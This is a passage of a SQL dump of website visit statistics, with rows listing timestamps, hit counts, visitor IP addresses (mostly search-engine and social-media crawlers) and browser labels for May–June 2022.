,0,1,0,'66.249.70.7',''),(563199,1652375152,1,1,0,0,'91.196.178.36','chrome'),(563200,1652379383,1,1,0,0,'87.250.224.19','other'),(563201,1652382308,1,0,1,0,'66.249.70.9',''),(563202,1652385642,1,1,0,0,'5.58.163.101','other'),(563203,1652388813,21,21,0,0,'168.63.252.149','chrome'),(563204,1652398577,1,1,0,0,'66.249.70.5','chrome'),(563205,1652423038,1,1,0,0,'198.235.24.137','other'),(563206,1652424437,1,0,1,0,'66.249.70.9',''),(563207,1652445845,1,1,0,0,'159.69.58.180','firefox'),(563208,1652448541,1,1,0,0,'66.249.70.29','chrome'),(563209,1652448574,1,1,0,0,'66.249.70.25','chrome'),(563210,1652449464,1,1,0,0,'66.249.70.9','chrome'),(563211,1652451844,1,1,0,0,'66.249.70.5','chrome'),(563212,1652452636,1,1,0,0,'194.38.20.161','other'),(563213,1652454235,1,1,0,0,'66.249.70.5','chrome'),(563214,1652456187,1,0,1,0,'66.249.70.29',''),(563215,1652457319,1,0,1,0,'66.249.70.25',''),(563216,1652457985,1,0,1,0,'66.249.70.5',''),(563217,1652458647,1,1,0,0,'66.249.70.7','chrome'),(563218,1652458915,1,0,1,0,'66.249.70.5',''),(563219,1652459455,1,1,0,0,'95.108.213.32','other'),(563220,1652459458,1,1,0,0,'87.250.224.74','other'),(563221,1652459461,1,1,0,0,'87.250.224.75','other'),(563222,1652459465,1,1,0,0,'87.250.224.50','other'),(563223,1652459468,1,1,0,0,'87.250.224.107','other'),(563224,1652459471,1,1,0,0,'141.8.142.88','other'),(563225,1652459484,1,1,0,0,'95.108.213.68','other'),(563226,1652459488,1,1,0,0,'87.250.224.82','other'),(563227,1652465269,1,0,1,0,'66.249.70.9',''),(563228,1652465413,1,1,0,0,'31.13.127.1','other'),(563229,1652465415,1,1,0,0,'31.13.103.116','other'),(563230,1652467187,1,0,1,0,'66.249.70.5',''),(563231,1652474183,9,9,0,0,'20.224.16.187','chrome'),(563232,1652491495,1,1,0,0,'66.249.70.7','chrome'),(563233,1652496200,1,0,1,0,'66.249.70.7',''),(563234,1652510517,1,1,0,0,'184.72.165.57','firefox'),(563235,1652517252,1,1,0,0,'66.249.70.9','chrome'),(563236,1652526903,1,1,0,0,'207.46.13.56','other'),(563237,1652535361,1,1,0,0,'31.13.127.22','other'),(563238,1652539240,1,1,0,0,'173.208.253.194','other'),(563239,1652540186,47,47,0,0,'173.208.253.194','other'),(563240,1652540198,11,11,0,0,'173.208.253.194','chrome'),(563241,1652550571,2,2,0,0,'91.206.168.59','firefox'),(563242,1652552707,1,0,1,0,'66.249.70.5',''),(563243,1652562955,10,10,0,0,'165.22.50.194','other'),(563244,1652563074,2,2,0,0,'165.22.50.194','chrome'),(563245,1652565516,1,1,0,0,'185.181.60.39','chrome'),(563246,1652565825,1,1,0,0,'217.70.186.133','other'),(563247,1652575995,1,1,0,0,'45.129.18.229','chrome'),(563248,1652590207,4,4,0,0,'65.21.194.221','chrome'),(563249,1652596848,1,1,0,0,'194.38.20.161','other'),(563250,1652612260,1,1,0,0,'173.252.107.9','other'),(563251,1652614893,1,1,0,0,'66.249.70.7','chrome'),(563252,1652619712,1,1,0,0,'66.249.70.9','chrome'),(563253,1652622386,1,1,0,0,'198.235.24.146','other'),(563254,1652625550,1,1,0,0,'94.247.172.129','other'),(563255,1652631335,1,1,0,0,'66.249.70.9','chrome'),(563256,1652637832,1,0,1,0,'66.249.70.7',''),(563257,1652639557,5,5,0,0,'2.58.149.35','chrome'),(563258,1652642956,1,1,0,0,'66.249.70.9','chrome'),(563259,1652665440,1,1,0,0,'46.17.172.80','chrome'),(563260,1652686423,9,9,0,0,'20.113.158.140','chrome'),(563261,1652695288,1,1,0,0,'198.235.24.146','other'),(563262,1652723387,1,0,1,0,'66.249.70.5',''),(563263,1652725005,1,1,0,0,'194.38.20.161','other'),(563264,1652726170,1,1,0,0,'173.212.214.140','firefox'),(563265,1652727500,1,1,0,0,'207.46.13.206','other'),(563266,1652730708,1,1,0,0,'207.46.13.187','other'),(563267,1652736210,1,1,0,0,'157.55.39.30','other'),(563268,1652762108,1,1,0,0,'66.220.149.118','other'),(563269,1652763002,1,1,0,0,'66.249.70.7','chrome'),(563270,1652798487,1,1,0,0,'141.43.203.226','firefox'),(563271,1652806978,1,1,0,0,'212.115.42.245','chrome'),(563272,1652808775,1,0,1,0,'66.249.70.7',''),(563273,1652810162,1,1,0,0,'66.249.70.9','chrome'),(563274,1652811179,4,4,0,0,'144.91.106.14','chrome'),(563275,1652815819,1,1,0,0,'207.46.13.56','other'),(563276,1652841111,17,17,0,0,'165.22.50.194','other'),(563277,1652846949,1,1,0,0,'66.249.70.5','chrome'),(563278,1652847078,1,1,0,0,'66.249.70.7','chrome'),(563279,1652849120,1,1,0,0,'66.249.70.5','chrome'),(563280,1652849934,1,1,0,0,'66.249.70.7','chrome'),(563281,1652855296,1,1,0,0,'66.249.70.9','chrome'),(563282,1652856540,1,1,0,0,'194.38.20.161','other'),(563283,1652859905,1,1,0,0,'91.196.178.169','chrome'),(563284,1652864963,2,0,2,0,'66.249.70.7',''),(563285,1652865356,1,0,1,0,'66.249.70.5',''),(563286,1652869520,1,1,0,0,'207.46.13.107','other'),(563287,1652894404,1,1,0,0,'157.55.39.226','other'),(563288,1652894926,1,0,1,0,'66.249.70.5',''),(563289,1652899869,1,1,0,0,'66.249.70.5','chrome'),(563290,1652900976,1,1,0,0,'207.55.255.20','firefox'),(563291,1652910436,1,1,0,0,'114.119.145.175','other'),(563292,1652917549,1,1,0,0,'207.46.13.175','other'),(563293,1652920810,1,1,0,0,'31.13.115.2','other'),(563294,1652921923,1,1,0,0,'66.249.70.7','chrome'),(563295,1652925138,1,1,0,0,'66.249.70.7','chrome'),(563296,1652928054,1,1,0,0,'66.249.70.9','chrome'),(563297,1652929848,1,0,1,0,'66.249.70.7',''),(563298,1652952184,15,15,0,0,'46.217.24.138','other'),(563299,1652956314,1,1,0,0,'51.15.205.3','other'),(563300,1652959233,26,26,0,0,'46.217.24.138','other'),(563301,1652965285,35,35,0,0,'46.217.24.138','other'),(563302,1652970296,1,1,0,0,'207.46.13.107','other'),(563303,1652971307,1,0,1,0,'66.249.70.9',''),(563304,1652980937,1,0,1,0,'66.249.70.5',''),(563305,1652985467,1,1,0,0,'194.38.20.161','other'),(563306,1652989827,1,1,0,0,'173.252.111.11','other'),(563307,1653015112,5,5,0,0,'18.218.226.184','chrome'),(563308,1653015339,1,1,0,0,'207.46.13.107','other'),(563309,1653025800,1,1,0,0,'185.114.247.197','chrome'),(563310,1653028790,2,0,2,0,'66.249.70.5',''),(563311,1653029129,1,0,1,0,'66.249.70.7',''),(563312,1653029131,1,1,0,0,'66.249.70.9','chrome'),(563313,1653052656,1,1,0,0,'191.101.217.118','chrome'),(563314,1653055271,1,1,0,0,'66.249.70.7','chrome'),(563315,1653059665,1,1,0,0,'157.55.39.174','other'),(563316,1653062631,1,0,1,0,'66.249.70.9',''),(563317,1653066124,1,0,1,0,'66.249.70.5',''),(563318,1653066897,1,1,0,0,'66.249.70.9','chrome'),(563319,1653069172,1,1,0,0,'157.55.39.144','other'),(563320,1653077607,1,1,0,0,'87.250.224.198','other'),(563321,1653080286,1,1,0,0,'46.183.163.202','firefox'),(563322,1653088693,1,1,0,0,'66.249.70.5','chrome'),(563323,1653121195,20,20,0,0,'188.166.213.203','chrome'),(563324,1653123026,8,8,0,0,'13.95.107.74','chrome'),(563325,1653137400,1,1,0,0,'66.249.66.61','chrome'),(563326,1653138425,1,1,0,0,'66.249.66.57','chrome'),(563327,1653139526,1,1,0,0,'66.249.66.57','chrome'),(563328,1653139755,1,0,1,0,'66.249.66.61',''),(563329,1653141459,1,1,0,0,'207.46.13.206','other'),(563330,1653151995,1,0,1,0,'66.249.66.59',''),(563331,1653152667,1,1,0,0,'194.38.20.161','other'),(563332,1653154086,1,1,0,0,'66.249.66.59','chrome'),(563333,1653157510,1,1,0,0,'207.46.13.206','other'),(563334,1653157949,1,0,1,0,'66.249.66.61',''),(563335,1653164351,3,3,0,0,'20.210.228.152','chrome'),(563337,1653165179,1,0,1,0,'66.249.66.57',''),(563338,1653168534,1,1,0,0,'207.46.13.105','other'),(563339,1653170969,1,1,0,0,'66.249.66.57','chrome'),(563340,1653174172,1,1,0,0,'45.129.18.97','chrome'),(563341,1653181211,1,1,0,0,'198.12.107.235','chrome'),(563342,1653190871,1,1,0,0,'185.181.60.189','chrome'),(563343,1653200272,1,1,0,0,'66.249.66.61','chrome'),(563344,1653218029,1,1,0,0,'216.145.5.42','firefox'),(563345,1653221041,1,0,1,0,'66.249.66.61',''),(563346,1653224688,1,0,1,0,'66.249.66.57',''),(563347,1653236181,1,0,1,0,'66.249.66.57',''),(563348,1653237412,1,1,0,0,'173.252.111.7','other'),(563349,1653237475,1,0,1,0,'66.249.66.61',''),(563350,1653245619,1,1,0,0,'66.249.66.59','chrome'),(563351,1653249215,1,0,1,0,'66.249.66.59',''),(563352,1653275340,1,1,0,0,'5.255.231.246','other'),(563353,1653275888,1,1,0,0,'157.55.39.92','other'),(563354,1653278275,1,0,1,0,'66.249.66.59',''),(563355,1653286064,1,1,0,0,'66.249.66.59','chrome'),(563356,1653289698,20,20,0,0,'157.245.196.90','chrome'),(563357,1653294653,1,1,0,0,'194.38.20.161','other'),(563358,1653297201,1,1,0,0,'162.0.209.22','other'),(563359,1653297441,2,2,0,0,'185.81.157.124','chrome'),(563360,1653298339,1,1,0,0,'52.14.14.112','firefox'),(563361,1653300713,1,1,0,0,'66.249.66.59','chrome'),(563362,1653303924,1,1,0,0,'66.249.66.61','chrome'),(563363,1653307489,1,1,0,0,'103.155.92.91','other'),(563364,1653323314,1,0,1,0,'66.249.70.5',''),(563365,1653324449,1,1,0,0,'46.101.95.65','firefox'),(563366,1653324453,1,1,0,0,'195.64.229.224','chrome'),(563367,1653335981,1,0,1,0,'66.249.70.9',''),(563368,1653346175,1,0,1,0,'66.249.70.5',''),(563369,1653347489,1,1,0,0,'66.249.70.9','chrome'),(563370,1653354805,1,1,0,0,'66.249.70.27','chrome'),(563371,1653365649,1,0,1,0,'66.249.70.5',''),(563372,1653365962,1,1,0,0,'37.19.223.215','chrome'),(563373,1653374236,1,1,0,0,'66.249.70.5','chrome'),(563374,1653376161,1,1,0,0,'35.88.19.206','chrome'),(563375,1653389191,20,20,0,0,'68.183.238.123','chrome'),(563376,1653392118,4,4,0,0,'91.221.6.35','chrome'),(563377,1653396759,1,1,0,0,'141.43.203.226','firefox'),(563378,1653397007,1,0,1,0,'66.249.76.71',''),(563379,1653397041,2,0,2,0,'66.249.66.61',''),(563380,1653411274,5,5,0,0,'81.248.139.70','chrome'),(563381,1653416378,1,1,0,0,'66.249.66.59','chrome'),(563382,1653426822,1,0,1,0,'66.249.66.59',''),(563383,1653443098,1,1,0,0,'5.255.253.164','other'),(563384,1653445937,41,41,0,0,'92.205.27.204','chrome'),(563385,1653448956,1,1,0,0,'65.21.206.42','chrome'),(563386,1653450272,1,1,0,0,'66.249.66.57','chrome'),(563387,1653450424,2,0,2,0,'66.249.66.59',''),(563388,1653470780,1,1,0,0,'194.38.20.161','other'),(563389,1653487363,1,1,0,0,'143.198.137.86','other'),(563390,1653497404,1,1,0,0,'207.46.13.61','other'),(563391,1653498976,1,1,0,0,'66.249.70.7','chrome'),(563392,1653507846,1,0,1,0,'66.249.70.9',''),(563393,1653511993,1,0,1,0,'66.249.70.7',''),(563394,1653517920,1,1,0,0,'54.218.158.79','chrome'),(563395,1653544508,1,1,0,0,'141.8.142.94','other'),(563396,1653548071,1,1,0,0,'178.128.95.64','chrome'),(563397,1653548097,1,1,0,0,'151.80.20.26','firefox'),(563398,1653549872,1,0,1,0,'66.249.70.9',''),(563399,1653551362,1,1,0,0,'157.55.39.32','other'),(563400,1653555832,1,1,0,0,'5.255.253.174','other'),(563401,1653558428,1,1,0,0,'185.158.115.77','msie'),(563402,1653575434,1,1,0,0,'207.46.13.107','other'),(563403,1653576414,1,1,0,0,'66.249.70.9','chrome'),(563404,1653578763,1,0,1,0,'66.249.70.5',''),(563405,1653585309,1,0,1,0,'66.249.70.27',''),(563406,1653585347,1,1,0,0,'66.249.70.25','chrome'),(563407,1653597068,1,1,0,0,'194.38.20.161','other'),(563408,1653598385,1,0,1,0,'66.249.70.27',''),(563409,1653600476,20,20,0,0,'167.71.216.44','chrome'),(563410,1653603530,1,1,0,0,'5.45.207.146','other'),(563411,1653618704,1,1,0,0,'31.210.20.125','chrome'),(563412,1653626501,1,1,0,0,'207.46.13.61','other'),(563413,1653633116,1,1,0,0,'207.46.13.105','other'),(563414,1653633127,1,1,0,0,'51.158.118.231','other'),(563415,1653639180,1,1,0,0,'66.249.70.7','chrome'),(563416,1653639287,1,1,0,0,'66.249.70.9','chrome'),(563417,1653644812,2,2,0,0,'66.249.70.7','chrome'),(563418,1653646171,1,1,0,0,'66.249.70.9','chrome'),(563419,1653646245,1,1,0,0,'66.249.70.5','chrome'),(563420,1653646351,1,1,0,0,'66.249.70.7','chrome'),(563421,1653647717,1,1,0,0,'66.249.66.57','chrome'),(563422,1653648595,1,0,1,0,'66.249.66.59',''),(563423,1653648713,1,1,0,0,'66.249.66.57','chrome'),(563424,1653649039,2,2,0,0,'66.249.66.59','chrome'),(563425,1653669981,1,1,0,0,'149.255.62.16','firefox'),(563426,1653670018,1,1,0,0,'31.13.127.19','other'),(563427,1653672674,1,1,0,0,'207.46.13.105','other'),(563428,1653672913,20,20,0,0,'188.166.213.203','chrome'),(563429,1653673068,1,1,0,0,'66.249.66.61','chrome'),(563430,1653673517,1,0,1,0,'66.249.66.209',''),(563431,1653674511,1,1,0,0,'178.133.89.215','chrome'),(563432,1653683216,1,0,1,0,'66.249.66.84',''),(563433,1653688910,1,1,0,0,'157.55.39.92','other'),(563434,1653689353,1,1,0,0,'66.249.66.211','chrome'),(563435,1653689398,1,0,1,0,'66.249.66.57',''),(563436,1653702014,1,0,1,0,'66.249.66.7',''),(563437,1653712994,1,0,1,0,'66.249.66.61',''),(563438,1653717328,5,5,0,0,'84.243.196.168','chrome'),(563439,1653719750,4,4,0,0,'193.29.220.11','chrome'),(563440,1653720941,1,1,0,0,'194.38.20.161','other'),(563441,1653730394,1,1,0,0,'66.249.66.59','chrome'),(563442,1653732291,8,8,0,0,'31.210.20.125','chrome'),(563443,1653733282,1,0,1,0,'66.249.66.9',''),(563444,1653739096,1,0,1,0,'66.249.66.158',''),(563445,1653745990,1,1,0,0,'66.249.66.57','chrome'),(563446,1653746803,1,0,1,0,'66.249.66.9',''),(563447,1653746807,1,1,0,0,'66.249.66.82','chrome'),(563448,1653747918,1,1,0,0,'157.55.39.92','other'),(563449,1653755686,1,1,0,0,'207.46.13.105','other'),(563450,1653759985,1,1,0,0,'162.241.174.216','firefox'),(563451,1653765234,1,1,0,0,'65.108.212.121','chrome'),(563452,1653769692,1,0,1,0,'66.249.66.5',''),(563453,1653769795,1,1,0,0,'207.46.13.61','other'),(563454,1653772291,1,1,0,0,'66.249.66.209','chrome'),(563455,1653776193,1,1,0,0,'173.252.79.19','other'),(563456,1653789239,1,1,0,0,'107.189.5.248','chrome'),(563457,1653789935,1,1,0,0,'66.249.66.84','chrome'),(563458,1653792965,1,1,0,0,'157.55.39.144','other'),(563459,1653794149,1,1,0,0,'66.249.66.7','chrome'),(563460,1653797474,1,0,1,0,'66.249.66.59',''),(563461,1653811426,1,1,0,0,'80.93.126.34','chrome'),(563462,1653813674,1,0,1,0,'66.249.66.59',''),(563463,1653814151,1,1,0,0,'66.249.66.59','chrome'),(563464,1653823227,1,0,1,0,'66.249.66.84',''),(563465,1653828987,1,1,0,0,'66.249.66.57','chrome'),(563466,1653838050,1,1,0,0,'194.163.159.35','firefox'),(563467,1653842548,1,1,0,0,'194.38.20.161','other'),(563468,1653844319,1,1,0,0,'66.249.66.129','chrome'),(563469,1653852676,1,1,0,0,'157.55.39.32','other'),(563470,1653856346,1,0,1,0,'66.249.66.82',''),(563471,1653867669,1,1,0,0,'178.128.95.64','chrome'),(563472,1653870846,1,1,0,0,'20.80.247.28','chrome'),(563473,1653890918,1,1,0,0,'66.249.66.61','chrome'),(563474,1653900256,1,1,0,0,'66.249.66.61','chrome'),(563475,1653904121,1,0,1,0,'66.249.66.59',''),(563476,1653915328,1,1,0,0,'207.46.13.61','other'),(563477,1653916260,1,1,0,0,'185.181.61.24','chrome'),(563478,1653918459,1,1,0,0,'31.13.127.18','other'),(563479,1653921890,1,1,0,0,'31.13.127.12','other'),(563480,1653921891,1,1,0,0,'31.13.127.116','other'),(563481,1653921892,1,1,0,0,'31.13.127.3','other'),(563482,1653926326,1,1,0,0,'207.46.13.107','other'),(563483,1653935570,1,1,0,0,'120.79.8.125','firefox'),(563484,1653937852,1,1,0,0,'5.181.170.173','msie'),(563485,1653941212,1,0,1,0,'66.249.66.84',''),(563486,1653941545,1,1,0,0,'66.249.66.209','chrome'),(563487,1653943163,1,1,0,0,'205.210.31.32','other'),(563488,1653946163,1,1,0,0,'207.46.13.107','other'),(563489,1653966618,13,13,0,0,'3.96.62.141','firefox'),(563490,1653969141,1,1,0,0,'194.38.20.161','other'),(563491,1653983905,1,1,0,0,'113.186.27.51','chrome'),(563492,1653984832,1,1,0,0,'31.13.127.16','other'),(563493,1653998716,1,1,0,0,'2.58.149.35','other'),(563494,1653998744,1,1,0,0,'2.58.149.35','chrome'),(563495,1654025944,1,0,1,0,'66.249.66.129',''),(563496,1654028642,1,1,0,0,'143.244.172.105','firefox'),(563497,1654029222,1,1,0,0,'136.243.56.95','opera'),(563498,1654030939,1,1,0,0,'136.243.56.95','opera'),(563499,1654035238,1,1,0,0,'157.55.39.144','other'),(563500,1654035379,1,1,0,0,'208.78.220.107','firefox'),(563501,1654037101,1,1,0,0,'136.243.56.95','opera'),(563502,1654038494,5,5,0,0,'18.222.182.36','chrome'),(563503,1654050460,1,1,0,0,'51.15.205.3','other'),(563504,1654055507,1,0,1,0,'66.249.66.61',''),(563505,1654061927,3,3,0,0,'31.13.127.7','other'),(563506,1654061945,1,1,0,0,'31.13.127.25','other'),(563508,1654061946,1,1,0,0,'31.13.127.28','other'),(563509,1654061947,1,1,0,0,'31.13.127.5','other'),(563510,1654061952,1,1,0,0,'31.13.127.14','other'),(563512,1654061953,1,1,0,0,'31.13.127.18','other'),(563514,1654061954,1,1,0,0,'31.13.127.12','other'),(563516,1654061955,1,1,0,0,'31.13.127.6','other'),(563517,1654061956,2,2,0,0,'31.13.127.13','other'),(563518,1654061957,1,1,0,0,'69.63.184.4','other'),(563519,1654061960,2,2,0,0,'31.13.127.27','other'),(563520,1654061961,2,2,0,0,'31.13.127.119','other'),(563521,1654062283,1,1,0,0,'31.13.127.10','other'),(563522,1654071407,1,0,1,0,'66.249.66.61',''),(563523,1654081233,1,1,0,0,'66.249.66.57','chrome'),(563524,1654083164,1,1,0,0,'66.249.66.59','chrome'),(563525,1654084449,1,1,0,0,'54.189.197.24','chrome'),(563526,1654084451,1,1,0,0,'35.167.33.168','chrome'),(563527,1654084455,2,2,0,0,'54.202.117.140','chrome'),(563528,1654084480,2,2,0,0,'35.87.84.175','chrome'),(563529,1654084482,1,1,0,0,'54.185.163.83','chrome'),(563530,1654084596,1,1,0,0,'54.218.90.36','chrome'),(563531,1654092491,1,1,0,0,'141.43.203.226','firefox'),(563532,1654098631,1,1,0,0,'194.38.20.161','other'),(563533,1654102380,1,1,0,0,'207.46.13.61','other'),(563534,1654110268,22,22,0,0,'206.189.158.168','chrome'),(563535,1654111804,1,0,1,0,'66.249.66.5',''),(563536,1654121311,5,5,0,0,'20.29.45.151','chrome'),(563537,1654123132,1,1,0,0,'157.55.39.144','other'),(563538,1654133985,1,1,0,0,'66.249.66.7','chrome'),(563539,1654139494,1,1,0,0,'66.249.66.207','chrome'),(563540,1654155107,1,1,0,0,'66.249.66.57','chrome'),(563541,1654169565,22,22,0,0,'207.241.235.133','other'),(563542,1654170472,1,1,0,0,'207.241.235.133','other'),(563543,1654174627,1,0,1,0,'66.249.66.59',''),(563544,1654197147,1,0,1,0,'66.249.66.5',''),(563545,1654204563,1,1,0,0,'66.249.66.211','chrome'),(563546,1654213301,1,1,0,0,'52.43.7.127','firefox'),(563547,1654214241,1,0,1,0,'66.249.66.61',''),(563548,1654214985,1,1,0,0,'194.38.20.161','other'),(563549,1654223338,1,1,0,0,'69.171.251.15','chrome'),(563550,1654229712,1,0,1,0,'66.249.66.57',''),(563551,1654248338,1,1,0,0,'35.162.42.165','chrome'),(563552,1654248339,1,1,0,0,'54.213.18.196','chrome'),(563553,1654248398,2,2,0,0,'54.245.16.77','chrome'),(563554,1654248437,1,1,0,0,'35.88.234.35','chrome'),(563555,1654259680,1,1,0,0,'31.13.127.6','other'),(563556,1654283571,1,0,1,0,'66.249.66.84',''),(563557,1654283572,1,0,1,0,'66.249.66.59',''),(563558,1654285883,1,1,0,0,'46.211.173.27','other'),(563559,1654329621,1,1,0,0,'157.55.39.92','other'),(563560,1654338125,1,1,0,0,'194.38.20.161','other'),(563561,1654341017,2,2,0,0,'172.245.120.9','chrome'),(563562,1654345657,1,1,0,0,'198.235.24.148','other'),(563563,1654352582,1,1,0,0,'205.210.31.26','other'),(563564,1654353836,1,1,0,0,'205.210.31.153','other'),(563565,1654357011,1,1,0,0,'205.210.31.21','other'),(563566,1654361989,1,1,0,0,'157.55.39.92','other'),(563567,1654362076,1,1,0,0,'143.244.172.105','firefox'),(563568,1654362775,1,1,0,0,'185.237.217.11','chrome'),(563569,1654368077,1,1,0,0,'185.237.217.11','chrome'),(563570,1654369976,1,0,1,0,'66.249.66.209',''),(563571,1654375902,1,0,1,0,'66.249.66.7',''),(563572,1654382477,1,1,0,0,'66.249.66.7','chrome'),(563573,1654384316,1,1,0,0,'198.235.24.155','other'),(563574,1654394167,5,5,0,0,'20.28.152.103','chrome'),(563575,1654397042,1,1,0,0,'207.46.13.20','other'),(563576,1654398760,1,1,0,0,'54.145.167.200','firefox'),(563577,1654411109,1,1,0,0,'66.249.66.63','chrome'),(563578,1654421927,1,1,0,0,'54.245.57.92','chrome'),(563579,1654421929,1,1,0,0,'34.218.238.200','chrome'),(563580,1654421943,2,2,0,0,'52.32.15.3','chrome'),(563581,1654421974,1,1,0,0,'35.90.27.73','chrome'),(563582,1654426871,1,1,0,0,'31.13.103.24','other'),(563583,1654426872,1,1,0,0,'31.13.103.120','other'),(563584,1654436572,2,2,0,0,'172.245.120.9','chrome'),(563585,1654437333,1,1,0,0,'157.55.39.92','other'),(563586,1654445485,1,1,0,0,'66.249.66.37','chrome'),(563587,1654447706,1,0,1,0,'66.249.66.129',''),(563588,1654452793,1,1,0,0,'167.172.30.43','other'),(563589,1654454105,1,1,0,0,'134.122.12.8','other'),(563590,1654456096,1,1,0,0,'194.38.20.161','other'),(563591,1654456470,1,0,1,0,'66.249.66.83',''),(563592,1654458846,1,1,0,0,'185.237.217.11','chrome'),(563593,1654487069,5,5,0,0,'35.217.33.156','chrome'),(563594,1654489663,1,1,0,0,'157.55.39.92','other'),(563595,1654523194,1,1,0,0,'91.196.178.204','chrome'),(563596,1654526047,1,1,0,0,'178.133.53.185','chrome'),(563597,1654528413,1,1,0,0,'66.249.70.7','chrome'),(563598,1654535812,1,1,0,0,'66.249.70.9','chrome'),(563599,1654539946,2,2,0,0,'172.245.120.9','other'),(563600,1654542977,2,0,2,0,'66.249.70.7',''),(563601,1654543669,1,1,0,0,'81.88.52.210','firefox'),(563602,1654568655,1,1,0,0,'66.249.70.5','chrome'),(563603,1654569082,1,1,0,0,'66.249.70.9','chrome'),(563604,1654590510,1,0,1,0,'66.249.70.5',''),(563605,1654607999,1,1,0,0,'198.235.24.20','other'),(563606,1654612518,1,1,0,0,'194.38.20.161','other'),(563607,1654617721,1,1,0,0,'20.191.45.212','other'),(563608,1654621815,1,1,0,0,'185.181.60.189','chrome'),(563609,1654629321,1,0,1,0,'66.249.66.34',''),(563610,1654645053,1,0,1,0,'66.249.66.63',''),(563611,1654686574,1,1,0,0,'157.55.39.92','other'),(563612,1654709042,1,1,0,0,'205.210.31.129','other'),(563613,1654710429,48,48,0,0,'173.208.149.114','other'),(563614,1654710725,11,11,0,0,'173.208.149.114','chrome'),(563615,1654712398,1,1,0,0,'54.38.211.183','firefox'),(563616,1654716058,1,0,1,0,'66.249.70.7',''),(563617,1654717017,1,1,0,0,'172.245.120.9','firefox'),(563618,1654717018,1,1,0,0,'172.245.120.9','other'),(563619,1654728733,1,0,1,0,'66.249.70.9',''),(563620,1654729416,1,1,0,0,'114.119.152.108','other'),(563621,1654730399,1,1,0,0,'194.38.20.161','other'),(563622,1654732882,1,1,0,0,'200.141.158.130','other'),(563623,1654748375,1,1,0,0,'65.21.206.45','chrome'),(563624,1654754865,1,1,0,0,'66.249.70.9','chrome'),(563625,1654757312,2,2,0,0,'20.90.50.39','chrome'),(563626,1654786546,1,1,0,0,'178.133.209.58','chrome'),(563627,1654798337,1,1,0,0,'93.114.234.242','firefox'),(563628,1654798996,1,1,0,0,'114.119.146.7','other'),(563629,1654802071,1,0,1,0,'66.249.70.7',''),(563630,1654803128,1,1,0,0,'31.13.127.19','other'),(563631,1654815653,1,1,0,0,'207.46.13.107','other'),(563632,1654842303,1,1,0,0,'91.196.178.169','chrome'),(563633,1654848763,1,1,0,0,'66.249.70.7','chrome'),(563634,1654852279,1,1,0,0,'66.249.70.7','chrome'),(563635,1654853093,1,1,0,0,'91.225.57.121','chrome'),(563636,1654853496,1,1,0,0,'194.38.20.161','other'),(563637,1654854519,1,1,0,0,'54.201.227.56','chrome'),(563638,1654854520,1,1,0,0,'34.219.200.238','chrome'),(563639,1654854552,2,2,0,0,'34.220.93.12','chrome'),(563640,1654854784,1,1,0,0,'52.43.109.39','chrome'),(563641,1654863948,1,1,0,0,'66.249.70.9','chrome'),(563642,1654865150,1,1,0,0,'66.249.70.5','chrome'),(563643,1654865682,1,1,0,0,'173.252.83.12','other'),(563644,1654868709,1,1,0,0,'205.210.31.141','other'),(563645,1654871147,1,0,1,0,'66.249.70.7',''),(563646,1654872931,1,1,0,0,'66.249.70.9','chrome'),(563647,1654874628,1,1,0,0,'188.115.138.57','chrome'),(563648,1654888627,1,0,1,0,'66.249.70.7',''),(563649,1654890077,1,1,0,0,'207.46.13.61','other'),(563650,1654893752,1,1,0,0,'66.249.70.7','chrome'),(563651,1654900300,1,1,0,0,'31.13.127.17','other'),(563652,1654903076,1,0,1,0,'66.249.70.9',''),(563653,1654905999,1,1,0,0,'205.210.31.12','other'),(563654,1654908635,1,1,0,0,'66.249.70.5','chrome'),(563655,1654908679,1,0,1,0,'66.249.70.7',''),(563656,1654914122,1,1,0,0,'66.249.70.9','chrome'),(563657,1654915538,1,1,0,0,'66.249.70.9','chrome'),(563658,1654915775,1,1,0,0,'66.249.70.7','chrome'),(563659,1654924047,1,1,0,0,'31.148.206.228','chrome'),(563660,1654933450,2,2,0,0,'65.154.226.170','chrome'),(563661,1654933668,1,1,0,0,'179.43.169.181','firefox'),(563662,1654933794,1,1,0,0,'79.104.53.14','firefox'),(563663,1654934030,1,1,0,0,'66.249.70.5','chrome'),(563664,1654940862,2,2,0,0,'133.242.174.119','other'),(563665,1654940863,2,2,0,0,'133.242.140.127','other'),(563666,1654943008,1,1,0,0,'62.122.67.10','chrome'),(563667,1654943010,2,2,0,0,'66.102.9.168','chrome'),(563668,1654950681,1,1,0,0,'31.13.103.118','other'),(563669,1654958789,1,1,0,0,'20.214.8.177','chrome'),(563670,1654964084,1,1,0,0,'64.246.165.180','firefox'),(563671,1654964727,1,1,0,0,'185.181.60.12','chrome'),(563672,1654967202,1,1,0,0,'157.245.231.45','firefox'),(563673,1654967295,1,1,0,0,'31.13.127.113','other'),(563674,1654972080,1,1,0,0,'194.38.20.161','other'),(563675,1654972779,2,2,0,0,'89.104.100.190','chrome'),(563676,1654974185,1,0,1,0,'66.249.70.9',''),(563677,1654974357,1,1,0,0,'65.154.226.220','chrome'),(563678,1654978834,1,1,0,0,'51.81.167.146','other'),(563679,1654980244,2,2,0,0,'89.104.101.122','chrome'),(563680,1655005784,2,2,0,0,'176.113.42.197','chrome'),(563681,1655007514,2,2,0,0,'45.90.60.192','chrome'),(563682,1655011887,1,0,1,0,'66.249.70.7',''),(563683,1655015143,1,1,0,0,'66.249.70.7','chrome'),(563684,1655024046,1,1,0,0,'185.237.217.11','chrome'),(563685,1655024331,1,1,0,0,'195.16.79.53','chrome'),(563686,1655026517,1,0,1,0,'66.249.70.9',''),(563687,1655026548,1,1,0,0,'66.249.70.5','chrome'),(563688,1655026613,1,1,0,0,'35.87.39.226','chrome'),(563689,1655026614,1,1,0,0,'35.89.187.47','chrome'),(563690,1655026633,2,2,0,0,'35.88.85.25','chrome'),(563691,1655026646,2,2,0,0,'52.34.164.107','chrome'),(563692,1655036054,1,1,0,0,'31.13.115.5','other'),(563693,1655037152,1,0,1,0,'66.249.70.7',''),(563694,1655057068,3,3,0,0,'69.171.249.4','other'),(563695,1655057069,2,2,0,0,'69.171.249.12','other'),(563696,1655058742,2,2,0,0,'176.53.221.170','chrome'),(563697,1655058872,1,1,0,0,'31.13.103.2','other'),(563698,1655058977,1,0,1,0,'66.249.70.5',''),(563699,1655065343,2,2,0,0,'45.90.63.135','chrome'),(563700,1655077591,1,1,0,0,'93.158.161.42','other'),(563701,1655082919,1,0,1,0,'66.249.70.9',''),(563702,1655088355,1,1,0,0,'207.46.13.20','other'),(563703,1655089061,2,2,0,0,'89.104.100.134','chrome'),(563704,1655089836,1,1,0,0,'93.158.161.72','other'),(563705,1655090651,2,2,0,0,'176.53.216.56','chrome'),(563706,1655095605,1,0,1,0,'66.249.70.9',''),(563707,1655097130,1,